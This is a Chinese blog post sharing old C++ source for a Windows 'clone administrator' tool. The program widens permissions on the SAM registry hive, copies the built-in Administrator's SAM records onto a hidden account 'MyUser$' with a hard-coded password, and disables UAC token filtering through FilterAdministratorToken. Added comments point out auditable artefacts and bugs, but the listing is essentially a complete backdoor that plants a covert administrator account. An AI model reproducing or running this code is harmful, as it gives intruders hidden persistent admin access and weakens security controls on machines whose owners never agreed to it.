克隆管理员代码
翻看了N年前的代码,看到了这个。
// Reference listing (old blog code) of the Windows "hidden administrator"
// account-clone technique: create a local user, widen the DACL on the
// HKLM\SAM\SAM key, read the built-in Administrator's (RID 0x1F4) "F" and
// "V" SAM blobs, delete the user through the Net API, and re-create its SAM
// keys by hand with the Administrator's blobs. For defenders, the observable
// artefacts are the DACL change on HKLM\SAM\SAM, the hand-made writes under
// HKLM\SAM\SAM\Domains\Account\Users (a Names entry whose F/V match RID
// 0x1F4) and the FilterAdministratorToken policy write in SetFilterFalse.
// The listing is C++ (new/delete), not C, and uses Win32 + NetAPI32 only.
#include <stdio.h>
#include <aclapi.h>
#include <windows.h>
#include <lm.h>
#pragma comment(lib, "netapi32.lib")

// A raw registry value: data buffer plus its length in bytes.
// The buffer is owned by whoever filled the struct (CloneAdmin allocates it).
typedef struct _KeyValue
{
    PBYTE value;
    DWORD KeyLen;
} KeyValue, *PKeyValue;

// One SAM user entry as this program models it: the RID plus the two
// REG_BINARY values stored under SAM\SAM\Domains\Account\Users\<RID>.
typedef struct _UserRegVal
{
    DWORD UserNum;  // user RID (read back from the Names entry's value type)
    KeyValue F;     // "F" blob; CloneAdmin allocates 0x100 bytes for it
    KeyValue V;     // "V" blob; CloneAdmin allocates 0x400 bytes for it
} UserRegVal, *PUserRegVal;

// Creates a local account with NetUserAdd (USER_INFO_1, USER_PRIV_USER,
// UF_SCRIPT, no home dir / comment / script path).
// Returns TRUE only on NERR_Success. The parameter-error output written to
// dwError is never examined, so a failing call gives no diagnostic.
BOOL AddUser(PWCHAR UserName, PWCHAR Passwd)
{
    USER_INFO_1 ui;
    DWORD dwLevel = 1;
    DWORD dwError = 0;
    NET_API_STATUS nStatus;
    ui.usri1_name = UserName;
    ui.usri1_password = Passwd;
    ui.usri1_priv = USER_PRIV_USER;
    ui.usri1_home_dir = NULL;
    ui.usri1_comment = NULL;
    ui.usri1_flags = UF_SCRIPT;
    ui.usri1_script_path = NULL;
    // add the user
    nStatus = NetUserAdd(NULL, dwLevel, (LPBYTE)&ui, &dwError);
    // success
    if (nStatus == NERR_Success)
    {
        return TRUE;
    }
    return FALSE;
}

// Unused stub: ignores all four arguments and always returns 0.
DWORD WriteObjectSecurity(int a1, LPWSTR pObjectName, int a3, PSECURITY_DESCRIPTOR bOwnerDefaulted)
{
    return 0;
}

// Unused helper: calls SetNamedSecurityInfoW on a registry key with a raw,
// undocumented-here security-information mask (0xB0000004) and NULL for
// owner, group, DACL and SACL. The return value is discarded.
VOID SetEveryOne(PWCHAR key)
{
    SetNamedSecurityInfoW(key, SE_REGISTRY_KEY, 0xB0000004, NULL, NULL, NULL, NULL);
}

// Appends one inheritable EXPLICIT_ACCESS entry for "administrators"
// (READ_CONTROL|WRITE_DAC|GENERIC_ALL) to the current DACL of the
// HKLM\SAM\SAM key and writes it back. This DACL change on the SAM hive is
// the first step of the clone and the earliest auditable artefact.
// Review notes: the GetNamedSecurityInfo result is not checked, so pOldDACL
// may be used uninitialised on failure; pSecDesc and pNewDACL are never
// released with LocalFree; the function returns 0 unconditionally, so
// `result` is computed but never reported to the caller.
DWORD SetAttribute()
{
    DWORD result;
    PSECURITY_DESCRIPTOR pSecDesc;
    PACL pOldDACL, pNewDACL;
    EXPLICIT_ACCESS ea;
    GetNamedSecurityInfo(TEXT("MACHINE\\SAM\\SAM\\"), SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
                         NULL, NULL, &pOldDACL, NULL, &pSecDesc);
    BuildExplicitAccessWithName(&ea, TEXT("administrators"),
                                READ_CONTROL|WRITE_DAC|GENERIC_ALL|SUB_CONTAINERS_AND_OBJECTS_INHERIT,
                                // author's alternative mask, left commented out:
                                // FILE_READ_DATA|FILE_LIST_DIRECTORY|FILE_READ_ATTRIBUTES|FILE_READ_EA,
                                SET_ACCESS, CONTAINER_INHERIT_ACE|OBJECT_INHERIT_ACE);
    result = SetEntriesInAcl(1, &ea, pOldDACL, &pNewDACL);
    if (result == ERROR_SUCCESS)
    {
        result = SetNamedSecurityInfo(TEXT("MACHINE\\SAM\\SAM\\"), SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
                                      NULL, NULL, pNewDACL, NULL);
    }
    return 0;
}

// Reads the SAM data the clone needs into *UserReg:
//   1. the "F" value of the fixed key ...Users\000001F4 (built-in
//      Administrator, RID 0x1F4) into UserReg->F;
//   2. the RID of UserName, taken from the *type* field of the first value
//      under ...Users\Names\<UserName> (RegEnumValue's lpType out-param);
//   3. the "V" value of ...Users\<RID> into UserReg->V.
// Caller contract: UserReg->F.value / V.value must already point at buffers
// and F.KeyLen / V.KeyLen hold their sizes — RegQueryValueEx uses KeyLen as
// the in/out byte count. Needs read access to the SAM hive.
// Returns FALSE if any step fails, but still attempts the later steps.
// Review notes: `KeyValue` here is an unused local that shadows the typedef;
// when RegEnumValue fails, the Names key handle is not closed (leak);
// buf/lpName/lpData are freed on every path that allocates them.
BOOL ReadUserReg(PWCHAR UserName, PUserRegVal UserReg)
{
    HKEY hKey;
    BOOL ntStatus = TRUE;
    DWORD KeyValue = 0;
    DWORD Type;
    PWCHAR buf = new WCHAR[MAX_PATH];
    wsprintfW(buf, L"SAM\\SAM\\Domains\\Account\\Users\\Names\\%s", UserName);
    // read admin F key
    long lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                             TEXT("SAM\\SAM\\Domains\\Account\\Users\\000001F4"), 0, KEY_READ, &hKey);
    if (lRet == ERROR_SUCCESS)
    {
        Type = REG_BINARY;
        if (RegQueryValueEx(hKey, TEXT("F"), 0, &Type, UserReg->F.value, &UserReg->F.KeyLen) != ERROR_SUCCESS)
        {
            ntStatus = FALSE;
        }
        RegCloseKey(hKey);
    }
    else
    {
        ntStatus = FALSE;
    }
    // read user V key
    lRet = RegOpenKeyExW(HKEY_LOCAL_MACHINE, buf, 0, KEY_READ, &hKey);
    if (lRet == ERROR_SUCCESS)
    {
        Type = REG_BINARY;
        PTCHAR lpName = new TCHAR[0x16];
        DWORD lpcbName = 0x16;
        PBYTE lpData = new BYTE[0x8];
        DWORD lpcbClass = 0x8;
        if (RegEnumValue(hKey, 0, lpName, &lpcbName, NULL, &Type, lpData, &lpcbClass) == ERROR_SUCCESS)
        {
            // the Names entry stores the RID in the value's type field
            UserReg->UserNum = Type;
            wsprintfW(buf, L"SAM\\SAM\\Domains\\Account\\Users\\%08X", Type);
            RegCloseKey(hKey);
            // reg read user V key
            lRet = RegOpenKeyExW(HKEY_LOCAL_MACHINE, buf, 0, KEY_READ, &hKey);
            if (lRet == ERROR_SUCCESS)
            {
                Type = REG_BINARY;
                if (RegQueryValueEx(hKey, TEXT("V"), 0, &Type, UserReg->V.value, &UserReg->V.KeyLen) != ERROR_SUCCESS)
                {
                    ntStatus = FALSE;
                }
                RegCloseKey(hKey);
            }
            else
            {
                ntStatus = FALSE;
            }
        }
        else
        {
            ntStatus = FALSE;
        }
        delete []lpData;
        delete []lpName;
    }
    else
    {
        ntStatus = FALSE;
    }
    delete []buf;
    return ntStatus;
}

// add the user into regedit
// Re-creates the user's SAM entry by hand from *UserReg: creates
// ...Users\<RID> (KEY_ALL_ACCESS) and writes the "V" and "F" blobs there,
// then creates ...Users\Names\<UserName> and sets its default value with
// the RID as the value *type* and no data — the inverse of what ReadUserReg
// reads. These two writes are the artefact a SAM consistency check would
// flag. Returns FALSE if either RegCreateKeyExW fails.
// Review notes: the RegSetValueEx results are unchecked, and `buf` is never
// deleted (leaks MAX_PATH WCHARs on every call).
BOOL SetUserReg(PWCHAR UserName, PUserRegVal UserReg)
{
    PWCHAR buf = new WCHAR[MAX_PATH];
    HKEY hKey;
    BOOL ntStatus = TRUE;
    wsprintfW(buf, L"SAM\\SAM\\Domains\\Account\\Users\\%08X", UserReg->UserNum);
    if (ERROR_SUCCESS == RegCreateKeyExW(HKEY_LOCAL_MACHINE, buf, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, 0))
    {
        RegSetValueEx(hKey, TEXT("V"), 0, REG_BINARY, UserReg->V.value, UserReg->V.KeyLen);
        RegSetValueEx(hKey, TEXT("F"), 0, REG_BINARY, UserReg->F.value, UserReg->F.KeyLen);
        RegCloseKey(hKey);
    }
    else
    {
        ntStatus = FALSE;
    }
    wsprintfW(buf, L"SAM\\SAM\\Domains\\Account\\Users\\Names\\%s", UserName);
    if (ERROR_SUCCESS == RegCreateKeyExW(HKEY_LOCAL_MACHINE, buf, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, 0))
    {
        // default value: type = RID, no data
        RegSetValueEx(hKey, NULL, 0, UserReg->UserNum, NULL, NULL);
        RegCloseKey(hKey);
    }
    else
    {
        ntStatus = FALSE;
    }
    return ntStatus;
}

// Deletes the local account with NetUserDel; TRUE only on NERR_Success.
BOOL DelUser(PWCHAR UserName)
{
    NET_API_STATUS nStatus;
    // delete the user
    nStatus = NetUserDel(NULL, UserName);
    if (NERR_Success == nStatus)
    {
        return TRUE;
    }
    return FALSE;
}

// clone the administrator set
// Orchestrates the clone: AddUser -> SetAttribute -> allocate the V (0x400)
// and F (0x100) buffers -> ReadUserReg -> DelUser -> SetUserReg.
// Returns FALSE when AddUser, SetAttribute or DelUser report failure;
// the ReadUserReg and SetUserReg results are ignored.
// Review notes: the `!= NULL` checks after `new` are dead under standard
// C++ (operator new throws) unless the build uses a legacy non-throwing
// new; the two buffers are never deleted; a failure after AddUser leaves
// the freshly created account behind.
BOOL CloneAdmin(PWCHAR UserName, PWCHAR Passwd)
{
    // add user
    if (!AddUser(UserName, Passwd))
    {
        return FALSE;
    }
    // set Reg attrib
    if (!SetAttribute())
    {
        return FALSE;
    }
    // copy the admin permission
    UserRegVal value;
    value.V.value = new BYTE[0x400];
    if (value.V.value != NULL)
    {
        value.V.KeyLen = 0x400;
    }
    value.F.value = new BYTE[0x100];
    if (value.F.value != NULL)
    {
        value.F.KeyLen = 0x100;
    }
    ReadUserReg(UserName, &value);
    // delete user
    if (!DelUser(UserName))
    {
        return FALSE;
    }
    // set the Regedit permission
    SetUserReg(UserName, &value);
    return TRUE;
}

// In Vista set the administrator not filter Token
// Writes FilterAdministratorToken = 0 (REG_DWORD, 4 bytes) under
// HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system — the UAC
// policy that controls token filtering for the built-in Administrator —
// creating the key if it does not exist. A registry-audit rule on this
// policy key observes the change. Returns FALSE if the key cannot be
// opened/created or the value write fails.
BOOL SetFilterFalse()
{
    HKEY hKey;
    BOOL ntStatus = TRUE;
    DWORD KeyValue = 0;
    long lRet = RegCreateKeyEx(HKEY_LOCAL_MACHINE,
                               TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system"),
                               0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
    if (lRet != ERROR_SUCCESS)
    {
        return FALSE;
    }
    if (ERROR_SUCCESS != RegSetValueEx(hKey, TEXT("FilterAdministratorToken"), 0, REG_DWORD, (const unsigned char *) &KeyValue, 4))
    {
        ntStatus = FALSE;
    }
    RegCloseKey(hKey);
    return ntStatus;
}

// Entry point: disables the administrator token filter, then runs the clone
// for the hard-coded account L"MyUser$" / L"123" and, on success, shows a
// message box (the literal reads "hidden user set up successfully").
// argc/argv are unused; the process always exits 0.
int main(int argc, char* argv[])
{
    if (SetFilterFalse())
    {
        if (CloneAdmin(L"MyUser$", L"123"))
        {
            MessageBox(NULL, TEXT("设置隐藏用户成功"), NULL, NULL);
        }
    }
    return 0;
}